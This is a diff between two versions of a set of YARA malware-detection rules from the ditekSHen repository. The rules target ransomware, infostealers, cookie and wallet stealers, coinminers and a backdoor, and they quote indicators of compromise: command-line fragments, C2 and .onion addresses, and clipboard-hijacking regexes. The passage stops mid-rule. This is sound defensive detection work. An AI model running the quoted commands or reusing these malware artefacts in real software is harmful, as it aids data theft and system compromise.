"https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7980-L7996" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "085a4783c7c01ec95491d9999d1835ad9ab3dc70d77b944578e097b3ffe3a627" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5763-L5776" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8febd1355bc03f71794ffb8d51cbb112e8acd2d26fec5bb736a388d5384e7747" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "%windir%\\system32\\rundll32.exe advapi32.dll,ProcessIdleTasks" fullword wide - $x2 = "https://fkpageintheworld342.com" fullword wide - $s1 = "ExecuteInstalledNodeAndDelete" fullword ascii - $s2 = "ProcessExsist" fullword ascii - $s3 = "helloworld.Certificate.txt" fullword wide - $s4 = "ASCII85 encoded data should begin with '" fullword wide - $s5 = "] WinRE config file path: C:\\" ascii - $s6 = "] Parameters: configWinDir: NULL" ascii - $s7 = "] Update enhanced config info is enabled." ascii + $s1 = "Startdelay for %d ms to avoid some dynamic AV detects!" ascii + $s2 = "Use Debug for moving faster!" ascii + $s3 = "Logging Mutex %s to %s" ascii + $s4 = "FIRST AND ONLY COPY RUNNING! Mutex %s" ascii + $s5 = "the most secret 3d GetWinApiPointers line in the world!" ascii + $s6 = "[+] makeMD5hash. " ascii condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 3 of ($s*)) or 5 of ($s*) or ( all of ($x*) and 2 of ($s*))) + uint16(0)==0x5a4d and 3 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Lockfile : FILE +rule DITEKSHEN_MALWARE_Win_Coinminer01 : FILE { meta: - description = "Detects LockFile ransomware" + description = "Detects coinmining malware" author = "ditekSHen" - id = "762ac376-43ff-56d2-b279-2879ce6d8542" - date = "2024-09-06" - modified = "2024-09-06" + id = "739e7cea-c6b6-5add-86d4-382b00e2b645" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L7998-L8014" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "28c8aa8931d599e5a1860fe2ed0b8172e709dad1a48a319858a907fa775af293" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5778-L5790" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "31a7531ecc7b8a35ba882c17d15bd3581e65b4b99dd3a7cb8bca8f6edf204114" score = 75 - quality = 71 + quality = 75 tags = "FILE" strings: - $x1 = "LOCKFILE" fullword ascii - $x2 = "25a01bb859125507013a2fe9737d3c33" fullword ascii - $s1 = "</key>" fullword ascii - $s2 = "<computername>%s</computername>" fullword ascii - $s3 = "<blocknum>%d</blocknum>" fullword ascii - $s4 = "%s\\%s-%s-%d%s" fullword ascii - $s5 = ">RAC=OQD:S>P@:AO?R:EEOS:ARDD=N?EENSB" ascii wide - $m1 = "<title>LOCKFILE" ascii wide nocase - $m2 = "4 and 2 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Unicorn : FILE +rule DITEKSHEN_MALWARE_Win_Cookiestealer : FILE { meta: - description = "Detects Unicorn infostealer" + description = "Detects generic cookie stealer" author = "ditekSHen" - id = "7cc8298d-abbd-5dda-bbd4-8b061095c367" - date = "2024-09-06" - modified = "2024-09-06" + id = "64c6c59d-4046-5949-bf71-22a5f6bfa209" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8077-L8107" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c4150b213c0dd88c87eb81e3ad455d8f658a57b0998bc6e394c5afac9423d9f2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5841-L5857" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9cc406ae078e37430b3cf10954c02014b9760bc887344842e724df735d1d9808" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "WinHTTP Downloader/1.0" fullword wide - $x2 = "[CTRL + %c]" fullword wide - $x3 = "\\UnicornLog.txt" fullword wide - $x4 = "/*INITIALIZED*/" fullword wide - $s1 = { 2f 00 63 00 20 00 22 00 43 00 4f 00 50 00 59 00 - 20 00 2f 00 59 00 20 00 2f 00 42 00 20 00 22 00 - 25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00 - 22 00 00 00 63 00 6d 00 64 00 2e 00 65 00 78 00 - 65 } - $s2 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 33 00 32 00 - 2e 00 65 00 78 00 65 00 00 00 00 00 25 00 73 00 - 20 00 22 00 25 00 73 00 22 00 2c 00 25 00 68 00 - 73 } - $s3 = "%*[^]]%c%n" fullword ascii - $s4 = "file://%s%s%s" fullword ascii - $s5 = "%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii - $s6 = "regex_start_injects" fullword ascii - $s7 = "DLEXEC" fullword ascii - $s8 = "^((((3|1)[A-Za-z0-9]{33}))(\\s|$)|(bc1q)[A-Za-z0-9]{38}(\\s|$))" fullword ascii - $s9 = "^(0x)?[A-Za-z0-9]{40}(\\s|$)" fullword ascii - $s10 = "clipRegex" fullword ascii - $s11 = "%s?k=%s&src=clip&id=%s" fullword ascii - $s12 = "http://izuw6rclbgl2lwsh.onion/o.php" fullword ascii + $s1 = "([\\S]+?)=([^;|^\\r|^\\n]+)" fullword ascii + $s2 = "(.+?): ([^;|^\\r|^\\n]+)" fullword ascii + $s3 = "Set-Cookie: ([^\\r|^\\n]+)" fullword ascii + $s4 = "cmd.exe /c taskkill /f /im chrome.exe" fullword ascii + $s5 = "FIREFOX.EXE|Google Chrome|IEXPLORE.EXE" ascii + $pdb1 = "F:\\facebook_svn\\trunk\\database\\Release\\DiskScan.pdb" fullword ascii + $pdb2 = "D:\\Projects\\crxinstall\\trunk\\Release\\spoofpref.pdb" fullword ascii + $ua1 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" fullword ascii + $ua2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($x*) or 8 of ($s*) or (3 of ($x*) and 5 of ($s*))) + uint16(0)==0x5a4d and (( all of ($s*) and 1 of ($pdb*) and 1 of ($ua*)) or ( all of ($ua*) and 1 of ($pdb*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Spectre : FILE +rule DITEKSHEN_MALWARE_Win_Bitcoingrabber : FILE { meta: - description = "Detects Spectre infostealer" + description = "Detects generic bitcoin stealer" author = "ditekSHen" - id = "43b32900-8dff-5a95-bcff-d6bd17703476" - date = "2024-09-06" - modified = "2024-09-06" + id = "f73b58da-1db5-5767-ae0a-074648e30966" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8109-L8124" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ee041928ab5010fd5a06538f9a7cf9c72e44903fdb05f13b12362af0b326fd6f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5859-L5875" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2dc762525c1fbf25517df52f0561d96d7469bf1367eada31c236fc313001c6cb" score = 75 quality = 75 tags = "FILE" - snort_sid = "920233-920234" strings: - $s1 = "\\../../../json.h" wide - $s2 = "static_cast(index) < kCachedPowers.size()" fullword wide - $s3 = " cmd.exe" fullword wide - $s4 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide - $h1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" fullword wide - $h2 = "----974767299852498929531610575" ascii wide - $h3 = "Content-Disposition: form-data; name=\"file\"; filename=\"" fullword ascii + $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide + $s2 = "Bitcoin-Grabber" ascii + $s3 = "Bitcoin_Grabber" ascii + $s4 = "encrypt resources [compress]T" fullword ascii + $s5 = "code control flow obfuscationT" fullword ascii + $s6 = "\\Users\\lakol\\Desktop\\a\\Crypto Currency Wallet Changer\\" ascii + $pat1 = "\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\\b" fullword wide + $pat2 = "\\b0x[a-fA-F0-9]{40}\\b" fullword wide + $pat3 = "\\b4([0-9]|[A-B])(.){93}\\b" fullword wide condition: - ( uint16(0)==0x5a4d and (( all of ($s*) and 1 of ($h*)) or ( all of ($h*) and 2 of ($s*)))) or (6 of them ) + uint16(0)==0x5a4d and 4 of ($s*) or ( all of ($pat*) and 2 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_HUNT_Blackbyte : FILE +rule DITEKSHEN_MALWARE_Win_FOXGRABBER : FILE { meta: - description = "Attempt on hunting BlackByte ransomware" + description = "Detects FOXGRABBER utility" author = "ditekSHen" - id = "c07e9b83-3bbf-52c9-b9fa-ca03f285a906" - date = "2024-09-06" - modified = "2024-09-06" + id = "b98e501c-e9c6-5fcc-bfa0-9475ce32864c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8126-L8139" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4ceb71e42b888522c183af7e180bae47510fc7aa60a713aa83ffc2c98c03466f" - score = 50 - quality = 57 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5877-L5890" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5ecba516f1155bdcccf83b0a034b11d8eac8619d4c3326fdbc76082fbe4daf02" + score = 75 + quality = 75 tags = "FILE" strings: - $s1 = "WalkDirAndEncrypt" ascii wide nocase - $s2 = "FileEncrypt" ascii wide nocase - $s3 = "BlackByte." ascii wide nocase - $s4 = "EnumerateDirAndEncrypt" ascii wide nocase - $s5 = "Dismount-DiskImage" ascii wide nocase - $s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" ascii wide nocase + $s1 = "start grabbing" wide + $s2 = "end grabbing in" wide + $s3 = "error of copying files from comp:" wide + $s4 = "\\Firefox\\" wide nocase + $pdb1 = "\\obj\\Debug\\grabff.pdb" ascii + $pdb2 = "\\obj\\Release\\grabff.pdb" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($pdb*) and 1 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlinjector05 : FILE +rule DITEKSHEN_MALWARE_Win_Browsergrabber : FILE { meta: - description = "Detects downloader / injector (NiceProcess)" + description = "Hunt for FOXGRABBER-like samples but for various browsers" author = "ditekSHen" - id = "857eb13b-a882-5326-b7aa-4d2fcd0b6425" - date = "2024-09-06" - modified = "2024-09-06" + id = "a50a60cf-5ab8-5e4e-be00-aa0306f4d84f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8141-L8158" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5345c2b03e14b7324a13bac0da783eec8c30da18043c1b2d46162e5b511fae63" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5892-L5906" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c96a63566280758d8c32542bfab3c6faa7d21329430345f51ea4c2f0a6809dc2" score = 75 - quality = 75 + quality = 25 tags = "FILE" strings: - $s1 = "pidhtmpfile.tmp" fullword ascii - $s2 = "pidhtmpdata.tmp" fullword ascii - $s3 = "pidHTSIG" fullword ascii - $s4 = "Taskmgr.exe" fullword ascii - $s5 = "[HP][" ascii - $s6 = "[PP][" ascii - $s7 = { 70 69 64 68 74 6d 70 66 69 6c 65 2e 74 6d 70 00 - 2e 64 6c 6c 00 00 00 00 70 69 64 48 54 53 49 47 - 00 00 00 00 ?? ?? 00 00 54 61 73 6b 6d 67 72 2e - 65 78 65 } + $s1 = "start grabbing" wide + $s2 = "end grabbing in" wide + $s3 = "error of copying files from comp:" wide + $s4 = /(Chrome|Edge)/ wide + $ff = "\\Firefox\\" wide nocase + $pdb1 = "\\obj\\Debug\\grab" ascii + $pdb2 = "\\obj\\Release\\grab" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and not ($ff) and ( all of ($s*) or (1 of ($pdb*) and 1 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Kutaki : FILE +rule DITEKSHEN_MALWARE_Win_Deathransom : FILE { meta: - description = "Detects Kutaki" + description = "Detects known DeathRansom ransomware" author = "ditekSHen" - id = "d91812bb-4564-56b5-9757-81255b5233fb" - date = "2024-09-06" - modified = "2024-09-06" + id = "a6eeb607-8b5c-5982-8b5a-aa2b3c6a65e6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8160-L8173" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "24fbc9ca6de421275813c285a8fca91cfcede48f4b4de9feda010c644f0c251f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L5908-L5925" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3c87364a7ecc403262056eeccaa16bf230fbbe684e21d35099d0d572abba9eda" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "AASEaHR0cDovL29qb3JvYmlhLmNsdWIvbGFwdG9wL2xhcHRvcC5waHA" ascii - $x2 = "aHR0cDovL3RlcmViaW5uYWhpY2MuY2x1Yi9zZWMva29vbC50eHQ" ascii - $s1 = "wewqeuuiwe[XXXXXXX]" ascii - $s2 = "alt|aHR0cD" ascii - $s3 = "2 and #s3>2 and #s4>2) } import "pe" -rule DITEKSHEN_MALWARE_Win_Milan : FILE +rule DITEKSHEN_MALWARE_Win_GENERIC03 : FILE { meta: - description = "Detects Milan Lyceum backdoor" + description = "Detects unknown malicious executables" author = "ditekSHen" - id = "2ea0775b-65d4-58b9-9af9-c07f29742627" - date = "2024-09-06" - modified = "2024-09-06" + id = "aa0a720d-8215-58d8-b3ce-98d50318cbf9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8396-L8467" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "102af43be7cc3d873fbce78c95c767ebb6aadb2e7084b48f3cf48c11071d7a71" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6143-L6154" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9166808a3dab80d9d85b3b976ae658160c8389c7d0e05a46d553b5bb9d41a1cb" score = 75 quality = 50 tags = "FILE" - hash1 = "21ab4357262993a042c28c1cdb52b2dab7195a6c30fa8be723631604dd330b29" - hash2 = "a2754d7995426b58317e437f8ed6770cd7bb7b18d971e23b2b300b75e34fa086" - hash3 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249" - hash4 = "b54a67062bdcd32dfa9f3d7b69780d2e6e4925777290bc34e8f979a1b4b72ea2" - hash5 = "b766522dd4189fef7775d663e5649ba9d8be8e03022039d20848fcbc3643e5f2" - hash6 = "d3606e2e36db0a0cb1b8168423188ee66332cae24fe59d63f93f5f53ab7c3029" - hash7 = "857e2f63a1078d49adc59a03482f7b362563f16fb251f174bdaa7759ed47922a" - hash8 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248" strings: - $ua1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" fullword wide - $ua2 = "Mozilla/5.0 (Android; Mobile; rv:28.0) Gecko/28.0 Firefox/28.0" fullword wide - $ua3 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 520)" fullword wide - $ua4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7)" fullword wide - $ua5 = "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko" fullword wide - $ua6 = "Mozilla/5.0 (iPad; U; CPU OS 5_1_1 like Mac OS X; en-us) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3" fullword wide - $ua7 = "Mozilla/5.0 (Linux; Android 4.1; Galaxy Nexus Build/JRN84D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19" fullword wide - $ua8 = "Mozilla/5.0 (Linux; Android 7.1.1; ASUS_X017DA Build/NGI77B; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/1.5.1(11790) Chrome/74.0.3729.157 Mobile Safari/537.36" fullword wide - $ua9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0" fullword wide - $ua10 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" fullword wide - $ua11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword wide - $ua12 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" fullword wide - $n1 = "charset={[A-Za-z0-9\\-_]+}" fullword wide - $n2 = "Content-Length: {[0-9]+}" fullword wide - $n3 = "Location: {[0-9]+}" fullword wide - $n4 = "Set-Cookie:\\b*{.+?}\\n" fullword wide - $n5 = "{}" fullword wide - $n6 = "&formid=" fullword ascii - $n7 = "/?id=" fullword ascii - $p1 = "\\milan\\Debug\\Milan.pdb" ascii - $p2 = "\\milan\\Release\\Milan.pdb" ascii - $p3 = "\\BackDor Last\\" ascii - $p4 = "\\BackDorLast\\" ascii - $s1 = "/q \"%s\" & waitfor" wide - $s2 = "/q \"%s\" & schtasks /delete" wide - $s3 = "*BOT@;" fullword ascii - $s4 = "mofcomp \"" fullword ascii - $s5 = "\"WQL\";};instance of " ascii - $s6 = "" fullword wide - $s7 = "cmd.exe /C " wide nocase - $d1 = "akastatus.com" ascii - $d2 = "centosupdatecdn.com" ascii - $d3 = "checkinternet.org" ascii - $d4 = "cybersecnet.co.za" ascii - $d5 = "cybersecnet.org" ascii - $d6 = "defenderlive.com" ascii - $d7 = "defenderstatus.com" ascii - $d8 = "digitalmarketingagency.net" ascii - $d9 = "dnsanalizer.com" ascii - $d10 = "dnscatalog.net" ascii - $d11 = "dnscdn.org" ascii - $d12 = "dnsstatus.org" ascii - $d13 = "excsrvcdn.com" ascii - $d14 = "hpesystem.com" ascii - $d15 = "livednscdn.com" ascii - $d16 = "micrsoftonline.net" ascii - $d17 = "ndianmombais.com" ascii - $d18 = "online-analytic.com" ascii - $d19 = "securednsservice.net" ascii - $d20 = "sysadminnews.info" ascii - $d21 = "uctpostgraduate.com" ascii - $d22 = "updatecdn.net" ascii - $d23 = "web-traffic.info" ascii - $d24 = "windowsupdatecdn.com" ascii - $d25 = "wsuslink.com" ascii - $d26 = "zonestatistic.com" ascii + $s1 = "lbroscfg.dll" wide + $s2 = "cmd /c ping 127.0.0.1 & del /f /q \"" fullword wide + $s3 = "E:\\Data\\Sysceo\\AD\\" fullword ascii + $s4 = "C++\\Browser_noime\\" ascii condition: - uint16(0)==0x5a4d and ((1 of ($p*) and (2 of ($s*) or 2 of ($ua*))) or (5 of ($n*) and (2 of ($ua*) or 1 of ($p*) or 1 of ($s*))) or (3 of ($s*) and (2 of ($ua*) or 5 of ($n*))) or (2 of ($d*) and 6 of them )) + uint16(0)==0x5a4d and 3 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_UNK05 : FILE +rule DITEKSHEN_MALWARE_Win_Pandastealer : FILE { meta: - description = "Detects potential BazarLoader" + description = "Detects Panda Stealer" author = "ditekSHen" - id = "12f66315-f381-5910-b1d4-2cbf21c889a4" - date = "2024-09-06" - modified = "2024-09-06" + id = "099f0a03-6dfd-5ae5-baaf-fe2b66de759d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8469-L8486" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b3074f237fbaf449a53dcc219f48509db6af4c0d0859e6590563c3412be30aa8" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6156-L6172" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "23a911bfe14defe8f961068d43bb349b66ee73f8b2f281f2bec1c0ecb8f37b25" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $s1 = "/api/get" ascii wide - $s2 = "PARENTCMDLINE" fullword ascii - $s3 = "https://microsoft.com/telemetry/update.exe" ascii wide - $s4 = "api.opennicproject.org" fullword ascii wide - $s5 = "https://%hu.%hu.%hu.%hu:%u" fullword ascii wide - $s6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31" ascii wide - $s7 = "PARENTJOBID" fullword ascii wide - $s8 = "\\System32\\rundll32.exe" fullword ascii wide - $s9 = "{ccc38b40-5b04-4fb1-a684-07c7e448d4df}" fullword ascii wide - $s10 = "{065f6686-990b-46fc-829c-a53ec188a723}" fullword ascii wide + $s1 = "\\tokens.txt" fullword ascii + $s2 = "user.config" fullword ascii + $s3 = "Discord\\" ascii + $s4 = "%s\\etilqs_" fullword ascii + $s5 = "buildSettingGrabber" ascii + $s6 = "buildSettingSteam" ascii + $s7 = ".?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@" ascii + $s8 = "UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr" ascii + $s9 = "|| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (" ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Clipbanker01 : FILE +rule DITEKSHEN_MALWARE_Win_Gelsemine : FILE { meta: - description = "Detects ClipBanker infostealer" + description = "Detects Gelsemine" author = "ditekSHen" - id = "b56514f4-8362-5698-8142-be836b70a11a" - date = "2024-09-06" - modified = "2024-09-06" + id = "f7e9ca53-fc52-5da0-a760-cb09c2544f4f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8488-L8521" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8ef90e22299a1009468761a4cdb8e2a92920d721f1a7ebceeb81a07e14f9156f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6174-L6194" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8c20efa6f34ee9165fac9f1f2e5eb20830a02016309dfaa5681977e1a8ac6068" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "Clipper" fullword wide - $s2 = "Ushell" fullword wide - $s3 = "Banker" fullword wide - $s4 = "ClipPurse" fullword wide nocase - $s5 = "SelfClip" fullword wide - $s6 = "Cliper" fullword wide - $s7 = "FHQD4313-33DE-489D-9721-6AFF69841DEA" fullword wide - $s8 = "Remove.bat" fullword wide - $s9 = "\\w{1}\\d{12}" fullword wide - $s10 = "SELECT * FROM Win32_ComputerSystem" fullword wide - $s11 = "red hat" fullword wide - $s12 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 - 2e 00 65 00 78 00 65 00 00 ?? 2f 00 63 00 72 00 - 65 00 61 00 74 00 65 00 20 00 2f 00 73 00 63 00 - 20 00 00 ?? 20 00 2f 00 6d 00 6f 00 20 00 00 ?? - 20 00 2f 00 72 00 6c 00 20 00 00 ?? 20 00 2f 00 - 74 00 6e 00 20 00 00 ?? 20 00 2f 00 74 00 72 00 - 20 00 00 ?? 20 00 ?? 00 ?? 00 00 ?? 2f 00 64 00 - 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00 - 6e } - $s13 = "ClipChanger" fullword ascii - $s14 = "CheckVirtual" fullword ascii - $s15 = "InjReg" fullword ascii - $s16 = "SuicideFile" fullword ascii - $s17 = "HideFile" fullword ascii - $s18 = "AntiVm" fullword ascii + $s1 = "If any of these steps fails.only pick one of the targets for configuration\"If you want to just get on with it*which also use [ " wide + $s2 = "A make implementation+with core modules (please read NOTES.PER_L)2The per_l Text::Template (please read NOTES.PER_L)" wide + $s3 = "NOTES.VMS (OpenVMS)!NOTES.WIN (any supported Windows)%NOTES.DJGPP (DOS platform with DJGPP)'NOTES.ANDROID (obviously Android [ND" wide + $s4 = "A simple example would be this)which is to be understood as one of these" fullword wide + $s5 = "bala bala bala" fullword wide + $s6 = "echo FOO" fullword wide + $s7 = "?_Tidy@?$basic_string@DU?$char_traits@D@std@@V" ascii + $o1 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c } + $o2 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c } + $o3 = { 8b 76 08 2b f0 a1 34 ff 40 00 03 f0 89 35 38 ff } + $o4 = { 83 c4 34 c3 8b 4e 20 6a 05 e8 73 10 00 00 8b 76 } + $o5 = { 8b 44 24 44 2b d1 03 d0 8b f2 e9 14 ff ff ff 8d } + $o6 = { 68 00 06 00 00 6a 00 e8 d3 ff ff ff a2 48 00 41 } condition: - uint16(0)==0x5a4d and 7 of them + uint16(0)==0x5a4d and (6 of ($s*) or ( all of ($o*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Zombieboy : FILE +rule DITEKSHEN_MALWARE_Win_Gelsevirine : FILE { meta: - description = "Detects ZombieBoy Downloader" + description = "Detects Gelsevirine" author = "ditekSHen" - id = "c1345196-1686-534c-ab4c-557113c83411" - date = "2024-09-06" - modified = "2024-09-06" + id = "70f0ed08-4e07-5ab3-968e-95059d20a8e9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L8523-L8532" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0840367c1b56c4c266f22400df95411ba7784b98919a922380e1ec789783bb65" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L6224-L6254" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = 